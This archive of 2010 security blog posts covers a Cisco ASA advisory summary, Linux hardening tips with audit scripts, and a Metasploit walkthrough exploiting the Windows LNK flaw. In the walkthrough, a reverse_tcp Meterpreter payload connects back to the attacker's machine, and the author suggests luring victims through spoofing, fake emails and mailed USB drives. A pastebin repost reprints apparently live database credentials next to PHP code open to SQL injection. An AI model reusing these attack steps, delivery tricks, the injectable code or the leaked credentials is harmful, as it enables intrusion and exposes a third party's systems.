Aug 04 2010

Multiple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04”

I received notification of the vulnerabilities outlined below via the Full-Disclosure mailing list, but you can find a direct link to the advisory here --> Link. I figured it was worth mentioning again, since most organizations depend on their firewall as the primary means of protection against the many threats on the internet.

The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

SunRPC Inspection Denial of Service Vulnerabilities

The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

Note: Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger them. These vulnerabilities can be triggered only by UDP packets, not TCP.

These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

Transport Layer Security (TLS) Denial of Service Vulnerabilities

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability

SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

Note: Only transit traffic can trigger this vulnerability; traffic that is destined to the appliance will not trigger it.

This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability

IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

As a side note, I would like to add that unless you are already running version 8.3 you should disable the vulnerable services and take a moment to read the release notes for version 8.3.

There are some syntax changes you have to adjust to, as well as a full rule-set conversion: from 8.3 onward, access lists applied to an interface must match the real (untranslated) address and port rather than the NAT-mapped one. Below is an example of an old rule and its recommended migrated counterpart. Only the line that permits the statically translated web server changes, from the mapped 172.23.57.170 port 5080 to the real 10.50.50.50 port 80; the UDP 5080 and TCP 10000 lines stay as they are because the static covers TCP 5080 only, and 10.2.3.4 has no translation at all. The static command itself is converted to object-based NAT by the upgrade; the example shows only the access-list side. Some of the migrated rules are not new, since they were already supported in older software versions; however, it is now mandatory to write them the recommended way instead of the older way.

Old Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Migrated Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 10.50.50.50 eq 80

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Jul 29 2010

Linux Basix Security Tips Part 1

A while back I hinted to the wonderful guys over at http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security. They agreed, and below are some of the notes that can be used to follow along with my segment.

Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

Taken from the Linux Basix website: “Our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.”

The goal of my segment is not to touch on anything too advanced; for that you can find several Linux hardening guides from CERT, the NSA and many other resources out there. Instead I will focus on a few tips that anyone new to Linux should keep in mind before connecting their server or workstation to the internet.

I would like to start by sharing a few sentences I found in a blog posting over at Computerworld:

“You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

Physical Security (might seem silly, but this should always be considered)

Configure the BIOS to disable booting from CDs/DVDs and external devices, and set a password to protect these settings. Bear in mind that BIOS and bootloader passwords only stop casual access: anyone who can pull the drive can read it, so you can go another step and encrypt the entire drive. Next, set a password for the GRUB bootloader:

  • Generate a password hash using the command /usr/sbin/grub-md5-crypt.
  • Add the hash to the global section at the top of /boot/grub/menu.lst (before the first title entry) as follows: password --md5 passwordhash
  • This applies to GRUB Legacy. GRUB 2 does not read menu.lst; there the hash comes from grub-mkpasswd-pbkdf2 and goes into a superusers/password_pbkdf2 entry under /etc/grub.d, followed by update-grub.

Install as little as possible

Take a moment to think about your installation. I understand you might not know exactly what you want, but don't install everything at first: just do the basics and, as you learn more, install those additional applications and do it properly. Also remove unnecessary packages, keep only the ones you need, and lastly remove any accounts that are not needed. Every package you do not install is one less thing to patch and one less service that might be listening.

# yum list installed
# yum list packageName
# yum remove packageName

OR

# dpkg --list
# dpkg -s packageName
# apt-get remove packageName

(dpkg --info reads a .deb archive, not an installed package; dpkg -s shows the status of an installed one.)

Stay away from clear-text protocols

Under no circumstances should you use a clear-text protocol. Telnet, rsh, rlogin, FTP and TFTP hand your username and password to anyone on the local network with a packet sniffer; use SSH, SCP or SFTP instead. If you are hosting a website or providing users with a login portal, serve it over HTTPS rather than HTTP, even if you have to generate your own certificate (a self-signed certificate still stops passive sniffing, but users will see a browser warning until they trust it).

Identify all open ports and services

It's important to know what ports you have open and what services are associated with them; this way you can decide whether you would like to block or filter them with a firewall. It is also important so that, in the event you notice a new port open, you already have a baseline to compare against.

To do this you can use a tool like Nmap (“Network Mapper”), which is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

ex nmap -A -sV 127.0.0.1

Note that scanning 127.0.0.1 shows every listening service, including ones bound only to the loopback interface; scan the host from another machine on the network to see what is actually reachable, and compare with the local list of listening sockets from netstat or ss.

You can also use the following to identify and turn off unwanted services (chkconfig and service are the Red Hat/CentOS tools; Debian and Ubuntu manage the same start-up links with update-rc.d):

To view all services that are turned on:
# chkconfig --list | grep '3:on'

To disable a service:

# service serviceName stop
# chkconfig serviceName off

Security software

  • Install antivirus software. I am aware that Linux is not highly prone to viruses like your average Windows PC, but don't for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “low hanging fruit”; in short, don't be the easy target.
  • Install and configure a host firewall (iptables) and a mandatory access control system (SELinux or AppArmor, depending on your distribution), and take a moment to read how to configure them. SELinux and AppArmor are not firewalls: they confine what a process may touch once it is running, which is what limits the damage when a listening service is exploited.

Keep Your Software Up to Date

  • Configure your system to update from your software repository and apply updates automatically. Security updates should be applied as soon as possible.
  • On Debian/Ubuntu, create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows. apt-get update on its own only refreshes the package lists; the upgrade line is what actually installs the updates:

#!/bin/sh
/usr/bin/apt-get update
/usr/bin/apt-get -y upgrade

Or use aptitude -y safe-upgrade in place of the last line; note that aptitude -s safe-upgrade only simulates the upgrade and installs nothing. The unattended-upgrades package does the same job with logging and the option of limiting itself to security updates, and yum-cron is the equivalent on Red Hat/CentOS.

Password policy

  • You want to ensure that you have a proper password policy. First identify any user accounts that have an empty password and either set one or remove the account.
  • Set up password aging; it is important to keep rotating your password, at a minimum every 60 days.
  • Set up some sort of lockout policy: if someone attempts a brute-force attack you need to at least slow them down. A common practice is to lock an account after 3 failed login attempts. Keep in mind that an attacker can use a lockout rule to lock your legitimate users out on purpose, so pair it with an automatic unlock after a few minutes rather than a permanent lock.

    To get password expiration information, enter:
    chage -l userName

    To see failed login attempts, enter:
    faillog

    To unlock an account after login failures, run:
    faillog -r -u userName

    Note you can use the passwd command to lock and unlock accounts:
    # lock account
    passwd -l userName

    # unlock account
    passwd -u userName

    To identify accounts with empty passwords, type the following command:
    # awk -F: '($2 == "") {print}' /etc/shadow

Make Sure No Non-Root Accounts Have UID Set To 0

Only the root account should have UID 0, which gives full permissions on the system. Type the following command to display all accounts with UID set to 0:

# awk -F: '($3 == "0") {print}' /etc/passwd

You should only see one line as follows:
root:x:0:0:root:/root:/bin/bash

If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.
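To put the empty-password, password-aging and UID 0 checks together, here is an added example (my own script, not from the original post or any of the tools it references) that runs them against passwd- and shadow-format files you pass in, so it works on copies or on the live /etc/passwd and /etc/shadow (reading shadow needs root). The sample files it builds are constructed for the demonstration: the account names, hashes and dates are made up, and the 60-day limit is the one suggested above.

```sh
#!/bin/sh
# Added example (not from the original post): the account checks above, applied to
# passwd/shadow-format files given as arguments. Usage on a real host (as root):
#   audit_accounts /etc/passwd /etc/shadow 60
# The sample files built below are constructed; accounts, hashes and dates are made up.

# Accounts whose UID is 0. Anything other than "root" here is effectively a second root.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts whose shadow password field is empty: login succeeds with no password at all.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Accounts whose maximum password age (shadow field 5, what "chage -M" sets) is unset
# or longer than $2 days. Locked accounts (hash starting with "!" or "*") cannot use a
# password at all, so they are skipped.
stale_aging_accounts() {
    awk -F: -v max="$2" '$2 !~ /^[!*]/ && ($5 == "" || $5 + 0 > max + 0) { print $1 }' "$1"
}

# Run all three checks and print one finding per line.
# Returns 1 if anything was found, 0 if the files are clean.
audit_accounts() {
    passwd_file=$1
    shadow_file=$2
    max_days=${3:-60}
    findings=0
    for name in $(uid0_accounts "$passwd_file"); do
        [ "$name" = root ] && continue
        echo "UID 0 account other than root: $name"
        findings=1
    done
    for name in $(empty_password_accounts "$shadow_file"); do
        echo "empty password: $name"
        findings=1
    done
    for name in $(stale_aging_accounts "$shadow_file" "$max_days"); do
        echo "password max age missing or over $max_days days: $name"
        findings=1
    done
    return $findings
}

# Constructed sample files: a second UID 0 account ("toor"), one empty password,
# and only alice with a 60-day maximum age. Hashes are placeholders, not real hashes.
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
SAMPLE_PASSWD_FILE=$SAMPLE_DIR/passwd
SAMPLE_SHADOW_FILE=$SAMPLE_DIR/shadow
cat > "$SAMPLE_PASSWD_FILE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
toor:x:0:0:backdoor:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
EOF
cat > "$SAMPLE_SHADOW_FILE" <<'EOF'
root:$6$placeholder$hash:14800:0:99999:7:::
daemon:*:14800:0:99999:7:::
toor::14800:0:99999:7:::
alice:$6$placeholder$hash:14800:0:60:7:::
bob:$6$placeholder$hash:14800:0:99999:7:::
EOF

if audit_accounts "$SAMPLE_PASSWD_FILE" "$SAMPLE_SHADOW_FILE" 60; then
    echo "no findings"
else
    echo "review the findings above"
fi
```

On the sample data the script reports toor twice (second UID 0 account and empty password) and flags root, toor and bob for a missing 60-day maximum age; the non-zero return code makes it easy to drop into a cron job that only mails you when something is wrong.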

File and file system security

SUID and SGID files on your system are a potential security risk, and should be monitored closely. Because these programs grant special privileges to the user who is executing them, it is necessary to ensure that insecure programs are not installed. A favorite trick of crackers is to exploit SUID-root programs, then leave a SUID program as a back door to get in the next time, even if the original hole is plugged.

  • Find all SUID/SGID programs on your system, and keep track of what they are, so you are aware of any changes which could indicate a potential intruder. Use the following command to find all SUID/SGID programs on your system:

# find / -type f \( -perm -4000 -o -perm -2000 \) -print

World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. Additionally, world-writable directories are dangerous, since they allow anyone with a local account to add or delete files as he wishes (for example, uploading malware to a website's document root and infecting visitors).

To locate all world-writable directories that lack the sticky bit (world-writable directories such as /tmp are acceptable when the sticky bit stops users deleting each other's files), use the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
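Here is an added example (my own, not from the original post or the Security-HOWTO it draws on) that wraps the SUID/SGID and world-writable checks above as functions and exercises them on a constructed directory tree in a temporary directory, so you can see without root what each check does and does not report. The fixture names are made up; on a real host you would call the functions with / as the argument.

```sh
#!/bin/sh
# Added example (not from the original post): the SUID/SGID and world-writable checks
# above, wrapped as functions and exercised on a constructed directory tree built in a
# temporary directory. On a real host call them with / as the argument.

# Regular files with the setuid or setgid bit set. "-perm -4000" means "at least these
# bits", and -xdev keeps find on one file system so /proc and network mounts are not walked.
find_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# World-writable directories without the sticky bit. /tmp is world-writable too, but its
# sticky bit (1000) stops users deleting or renaming each other's files, so it is excluded.
find_world_writable_dirs() {
    find "$1" -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print | sort
}

# World-writable regular files, which the directory check above does not report.
find_world_writable_files() {
    find "$1" -xdev -type f -perm -0002 -print | sort
}

# Print all three lists with labels and paths relative to the root given; this is the
# baseline you keep and diff against later.
permission_report() {
    root=$1
    find_suid_sgid "$root"            | sed "s|^$root/|suid/sgid: |"
    find_world_writable_dirs "$root"  | sed "s|^$root/|world-writable dir (no sticky): |"
    find_world_writable_files "$root" | sed "s|^$root/|world-writable file: |"
}

# Constructed fixture tree (modes set explicitly so the umask does not matter).
FIXTURE=$(mktemp -d)
trap 'rm -rf "$FIXTURE"' EXIT
mkdir -p "$FIXTURE/bin" "$FIXTURE/dropbox" "$FIXTURE/tmp" "$FIXTURE/www"
chmod 0755 "$FIXTURE/bin" "$FIXTURE/www"
: > "$FIXTURE/bin/passwd";     chmod 4755 "$FIXTURE/bin/passwd"     # setuid, like /usr/bin/passwd
: > "$FIXTURE/bin/wall";       chmod 2755 "$FIXTURE/bin/wall"       # setgid
: > "$FIXTURE/bin/ls";         chmod 0755 "$FIXTURE/bin/ls"         # ordinary binary: not reported
: > "$FIXTURE/www/index.html"; chmod 0666 "$FIXTURE/www/index.html" # anyone can deface it
chmod 0777 "$FIXTURE/dropbox"  # world-writable, no sticky bit: reported
chmod 1777 "$FIXTURE/tmp"      # world-writable with sticky bit, like /tmp: not reported

permission_report "$FIXTURE"
```

Save the report output once the system is set up and diff against it later; a new setuid binary or a fresh world-writable directory showing up in the diff is exactly the change the paragraph above tells you to watch for.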

Secure ssh remote access

  • Disable root login via SSH. If someone is going to try and brute-force your SSH server, the first username they will try is root, so ensure that you do not allow SSH login for the root user. You can verify or change this by editing the config file:

vi /etc/ssh/sshd_config

Find the line containing “PermitRootLogin”. As shipped it is commented out, and a commented line only documents the default and changes nothing, so remove the leading # and set it to no:

#LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6

Then restart your SSH service with sudo /etc/init.d/sshd restart (on Debian and Ubuntu the service is called ssh, so sudo /etc/init.d/ssh restart). Make sure you have a working non-root account with sudo rights before you do this, or you will lock yourself out.
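Because a commented PermitRootLogin line does nothing, and because sshd takes the first occurrence of a keyword and ignores later duplicates, it is worth checking what value sshd will actually use rather than trusting a grep. The following is an added example of mine (not from the original post) that reports the effective value of a keyword from an sshd_config and judges the root-login setting; the three config files it builds are constructed for the demonstration, and it does not evaluate Match blocks (sshd -T prints the fully resolved configuration if you want the authoritative answer).

```sh
#!/bin/sh
# Added example (not from the original post): report the value sshd will actually use
# for a keyword. sshd ignores comment lines and, for a keyword given more than once,
# keeps the FIRST occurrence, so "#PermitRootLogin no" changes nothing and a "no"
# appended at the bottom loses to a "yes" higher up. Match blocks are not evaluated.
# Usage on a real host:  check_root_login /etc/ssh/sshd_config
# The three config files built below are constructed for the demonstration.

# Print the effective value of keyword $2 in config file $1 (empty if it is not set).
effective_setting() {
    awk -v key="$2" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }        # comments and blank lines
        tolower($1) == "match"   { exit }        # conditional section: stop here
        tolower($1) == tolower(key) {            # first occurrence wins
            sub(/^[ \t]*[^ \t]+[ \t]+/, "")
            sub(/[ \t]+$/, "")
            print
            exit
        }' "$1"
}

# Returns 0 only when root login over SSH is explicitly disabled.
check_root_login() {
    value=$(effective_setting "$1" PermitRootLogin)
    case "$value" in
        "")
            echo "PermitRootLogin is not set; the compiled-in default applies (yes before OpenSSH 7.0, prohibit-password since)"
            return 1 ;;
        [Nn][Oo])
            echo "PermitRootLogin no: root cannot log in over SSH"
            return 0 ;;
        *)
            echo "PermitRootLogin $value: root login is still possible"
            return 1 ;;
    esac
}

CFG_DIR=$(mktemp -d)
trap 'rm -rf "$CFG_DIR"' EXIT
CFG_DEFAULT=$CFG_DIR/sshd_config.default     # only the commented lines shown above
CFG_APPENDED=$CFG_DIR/sshd_config.appended   # "no" added at the end, after an earlier "yes"
CFG_HARDENED=$CFG_DIR/sshd_config.hardened   # uncommented, set once, near the top
cat > "$CFG_DEFAULT" <<'EOF'
#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6
EOF
cat > "$CFG_APPENDED" <<'EOF'
PermitRootLogin yes
#MaxAuthTries 6
PermitRootLogin no
EOF
cat > "$CFG_HARDENED" <<'EOF'
LoginGraceTime 30
PermitRootLogin no
MaxAuthTries 3
#PermitRootLogin yes
EOF

for cfg in "$CFG_DEFAULT" "$CFG_APPENDED" "$CFG_HARDENED"; do
    printf '%s: ' "${cfg##*/}"
    check_root_login "$cfg" || true
done
```

Only the hardened file passes: the shipped file has nothing uncommented, and the appended file still allows root because the earlier "yes" wins.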

Unowned files

Files not owned by any valid user or group can pose a security problem (they are typically left behind when an account is deleted). Find those that do not belong to a valid user and a valid group with the following command:

find /dir -xdev \( -nouser -o -nogroup \) -print

Keeping an eye on your logs:

You should configure logging and auditing so you can keep an eye on any attacks launched against your system. You can check the following logs manually or use a tool like logwatch or logcheck, or any number of log parsers out there. Logs of interest are (Debian/Ubuntu names shown; Red Hat/CentOS keeps the sshd and su entries in /var/log/secure instead):

  • /var/log/syslog
  • /var/log/faillog (binary; read it with the faillog command)
  • /var/log/auth.log
  • /var/log/lastlog (binary; read it with the lastlog command)
  • /var/log/messages
  • /var/log/apache2/access.log and error.log
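The thing you end up looking for in auth.log more than anything else is who is hammering your SSH server, which is also what DenyHosts (mentioned below) automates. As an added example (my own, not from the original post or from DenyHosts), here is that summary done with awk: failed logins per source address, the sources over a threshold, and the usernames tried. The log lines are constructed, with addresses from documentation ranges.

```sh
#!/bin/sh
# Added example (not from the original post): summarise failed SSH logins from
# auth.log-style lines. On a real Debian/Ubuntu host run
#   failed_logins_by_ip /var/log/auth.log
# (Red Hat/CentOS write the same sshd lines to /var/log/secure).
# The log lines below are constructed for the demonstration.

# Count "Failed password" lines per source address. Output: "<count> <ip>", busiest first.
failed_logins_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") { count[$(i + 1)]++; break }
         }
         END { for (ip in count) print count[ip], ip }' "$1" | sort -rn
}

# Addresses with at least $2 failures: candidates for a firewall drop or a DenyHosts entry.
ips_over_threshold() {
    failed_logins_by_ip "$1" | awk -v min="$2" '$1 + 0 >= min + 0 { print $2 }'
}

# Distinct usernames tried, including invalid ones ("Failed password for invalid user X"),
# which shows whether this is a dictionary run or someone targeting a real account.
usernames_tried() {
    awk '/Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "for") {
                 u = ($(i + 1) == "invalid") ? $(i + 3) : $(i + 1)
                 print u
                 break
             }
         }' "$1" | sort -u
}

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Jul 29 03:12:01 host sshd[2104]: Failed password for root from 203.0.113.7 port 41022 ssh2
Jul 29 03:12:04 host sshd[2104]: Failed password for root from 203.0.113.7 port 41022 ssh2
Jul 29 03:12:09 host sshd[2110]: Failed password for invalid user admin from 203.0.113.7 port 41100 ssh2
Jul 29 03:13:40 host sshd[2131]: Failed password for alice from 198.51.100.23 port 50212 ssh2
Jul 29 03:14:02 host sshd[2131]: Accepted password for alice from 198.51.100.23 port 50212 ssh2
Jul 29 03:20:15 host sshd[2150]: Invalid user oracle from 203.0.113.7
Jul 29 03:20:17 host sshd[2150]: Failed password for invalid user oracle from 203.0.113.7 port 41211 ssh2
EOF

echo "failed logins by source:"
failed_logins_by_ip "$SAMPLE_LOG"
echo "sources at or above 3 failures:"
ips_over_threshold "$SAMPLE_LOG" 3
echo "usernames tried:"
usernames_tried "$SAMPLE_LOG"
```

In the sample, 203.0.113.7 accounts for four failures across root, admin and oracle (a dictionary run), while the single failure from 198.51.100.23 is followed by a successful login for alice, which is what a mistyped password looks like.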

When all else fails, here are some useful scripts and tools you can use:

Lynis: Lynis is an auditing tool for Unix specialists. It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

sectool: a security audit tool that can be used both for security audits and as part of an intrusion detection system. It consists of a set of tests, a library and textual/graphical front-ends. Tests are sorted into groups and security levels; administrators can run selected tests, groups or whole security levels.

The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, granularly reporting on each of the security settings with which it works.

audit2.pl (Perl): this second script from the boran.ch audit scripts searches the entire file system, listing SUID, SGID, world-writable and group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g. containing punctuation characters), which might be dangerous or a sign of penetration. On a large server with 100 GB disks, this can take a few hours to run.

unix-privesc-check is a script that runs on Unix systems (tested on Solaris 9, HP-UX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

References:

http://iase.disa.mil/stigs/checklist/index.html

http://www.sans.org/score/checklists/linuxchecklist.pdf

http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

http://www.cyberciti.biz/tips/linux-security.html

http://www.debian.org/doc/manuals/securing-debian-howto/

http://tldp.org/HOWTO/Security-HOWTO/file-security.html

http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

http://www.rootkit.nl/projects/lynis.html

https://fedorahosted.org/sectool/

http://www.security-database.com/toolswatch/

http://securitytube.net/Mastering-IPTables-video.aspx

http://nmap.org/

http://www.openvas.org/

http://www.bastille-unix.org/

http://denyhosts.sourceforge.net/

http://pentestmonkey.net/tools/unix-privesc-check/

http://www.boran.ch/audit

http://oreilly.com/pub/h/66

http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/

Jul 22 2010

Exploiting MS “LNK” Vulnerability

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was performed using my BT4 VM, which was assigned IP address 192.168.126.135, and a Windows XP SP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get latest update

On my BackTrack 4 VM I browsed to /pentest/exploit/framework3, then loaded msfconsole; once that is loaded, run svn update so you can get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

The show options command lists the parameters that need to be set for the exploit to work; in our case that is the listening IP address and port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port of the machine you are launching the attack from. If this is not correct the victim machine would not know where to connect back to, since I selected reverse_tcp. SRVHOST is the address the exploit's malicious share and web server listen on; LHOST is where the Meterpreter payload connects back.

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.126.135

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.126.135

msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage you have to get a bit creative; here are a few things you can try:

  • Use Ettercap to DNS-spoof a target network and redirect them to your malicious URL.
  • Use a tool like the Social-Engineer Toolkit (SET) to send a spoofed email with your malicious link.
  • ARP-spoof your host network, find a target that is using Facebook or one of the many social networks, and try to send them the link that way.
  • Try a far-out social engineering attack: purchase several USB drives, load the malicious shortcut on them and mail them to your target labelled “free USB drive”.

Once you have your targets in sight just sit back and wait; once an exploitation has been kicked off you will see the below:

Fig-4 Successful Exploit

Verify that you have an active session using sessions -l, then connect to that session with sessions -i #; from there you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user, who is not aware of everyday vulnerabilities, can do, but we as IT professionals need to be in the loop so that we can take the information back and make them aware. Lastly, the image in figure 6 should be a dead giveaway that something is up with your computer: if you didn't connect to a share but all of a sudden see one pop up, it is time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback is welcome.



Jul 22 2010

Being smart about testing your application

This is just going to be a short write-up on something I figured was worth mentioning. While going through pastebin I found the following entry 3 seconds after it was posted --> http://pastebin.com :

<?php
include 'top.php';
include 'submenuhonorshall.php';
/*SELECT * FROM TABLE WHERE field =
*/
$db = 'gnemi_addison';
mysql_connect("gnemi.php-corner.com", "gnemi_root", "ignurupi87") or die(mysql_error());
mysql_select_db($db) or die(mysql_error());
?>
<div id="content">
<h1>Honors Hall Library</h1>
<form method="post">
<p class="norm">
<select name="searchby">
<option value="Author_First_Name">Author First Name</option>
<option value="Author_Last_Name" selected="selected">Author Last Name</option>
<option value="Title">Title</option>
</select>
<input type="text" name="query" />
<input type="submit" value="Submit!" />
</p>
</form>
<?php
$result = mysql_query("SELECT * FROM `library` WHERE `'" . $_POST['searchby'] . "'` = '" . $_POST['query'] . "' ORDER BY `Title` LIMIT 20");
while ($row = mysql_fetch_array($result))
{
echo $row['Last Name'] . $row['First Name'] . $row['Title'] .$row['inout'];
}
?>
<?php
include '../address.php';
include '../phptemplates/bottomhall.php';
?>

Now to the average person that's not a big deal, but to me, after looking at that bit of PHP code, the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly, are the username and password referenced still being used currently?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat ***DID NOT LOGIN*** so I don't know if those credentials are valid, BUT what if they were? I am hoping for this person's sake all of the above information is just for testing purposes, but what if it's not? Sanitizing all valid information before posting it would have been nice.

Jul 19 2010

Microsoft Validates Shortcut Vulnerability

Last Thursday I read a posting over at http://krebsonsecurity.com referencing a potential vulnerability that relates to the way Windows parses shortcuts. Since Microsoft didn't confirm this at the time it was just another interesting read. Now, one day later, Microsoft did validate this claim and now it's yet another Windows zero-day without a proper workaround.

Issue:

